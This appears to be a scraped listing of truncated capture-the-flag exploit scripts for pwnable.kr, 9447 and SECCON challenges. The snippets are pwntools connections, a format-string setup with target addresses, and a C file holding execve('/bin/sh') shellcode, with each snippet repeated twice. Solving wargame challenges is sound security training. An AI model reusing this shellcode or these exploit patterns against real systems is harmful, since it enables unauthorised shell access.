Cubarco cubarco

## pwnable-toddlersbottle-input.py
#!/usr/bin/env python
# coding=utf8

'''
    Copy this file to /tmp, and run. That's all.
'''

import os
import socket
import random

## pwnable-toddlersbottle-coin1.py
#!/usr/bin/env python
# coding=utf8

'''
    Copy this file to /tmp, and run it.
'''

import socket
import re
import sys

## pwnable-toddlersbottle-blackjack.py
#!/usr/bin/env python
# coding=utf8

import socket
import re
import sys


def debug(string):
    print '\033[92m' + '[DEBUG] ' + '\033[0m' + string

## simplehttpserver.go
package main

import (
	"flag"
	"fmt"
	"net/http"
)

func main() {
	var port string

## 9447-calcpop-reloaded.py
#!/usr/bin/env python
# coding=utf8

from pwn import p32, remote, context, asm, shellcraft

import sys

context.arch = 'i386'

p = remote('localhost', 9447)

## 9447-calcpop.py
#!/usr/bin/env python
# coding=utf8

from pwn import process, p32, remote

p = process("./calcpop")
#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)

print p.recvline()

## 2015-seccon-treewalker.py
#!/usr/bin/env python
# coding=utf8

from pwn import context, p64, process, remote
from struct import unpack

context.arch = 'amd64'

# p = process('./treewalker')
p = remote('treewalker.pwn.seccon.jp', 20000)

## pwnable-rookiss-fsb.py
#!/usr/bin/env python
# coding=utf8

from pwn import process
from time import sleep

p = process('./fsb')

read_got = 0x804a000
congratz_addr = 0x804869f

## pwnable-rookiss-tiny-easy.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

char *shellcode = \
     "\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
     "\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
     "\x6e\x2f\x73\x68";

## pwnable-hackerssecret-tiny.c
#include <stdio.h>
#include <unistd.h>

int main()
{
    char *envp[] = {
        "env1=1", "env2=2", "env3=3",
        "/bin/sh", "env5=5", NULL
    };
    execle("/home/tiny/tiny", "\xc8\x75\x55\x55",
	#!/usr/bin/env python
	# coding=utf8

	'''
	Copy this file to /tmp, and run. That's all.
	'''

	import os
	import socket
	import random
	#!/usr/bin/env python
	# coding=utf8

	'''
	Copy this file to /tmp, and run it.
	'''

	import socket
	import re
	import sys
	package main

	import (
	"flag"
	"fmt"
	"net/http"
	)

	func main() {
	var port string
	#!/usr/bin/env python
	# coding=utf8

	from pwn import p32, remote, context, asm, shellcraft

	import sys

	context.arch = 'i386'

	p = remote('localhost', 9447)
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process, p32, remote

	p = process("./calcpop")
	#p = remote('calcpop-4gh07blg.9447.plumbing', 9447)

	print p.recvline()
	#!/usr/bin/env python
	# coding=utf8

	from pwn import context, p64, process, remote
	from struct import unpack

	context.arch = 'amd64'

	# p = process('./treewalker')
	p = remote('treewalker.pwn.seccon.jp', 20000)
	#!/usr/bin/env python
	# coding=utf8

	from pwn import process
	from time import sleep

	p = process('./fsb')

	read_got = 0x804a000
	congratz_addr = 0x804869f
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/wait.h>

	char *shellcode = \
	"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
	"\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
	"\x6e\x2f\x73\x68";
	#include <stdio.h>
	#include <unistd.h>

	int main()
	{
	char *envp[] = {
	"env1=1", "env2=2", "env3=3",
	"/bin/sh", "env5=5", NULL
	};
	execle("/home/tiny/tiny", "\xc8\x75\x55\x55",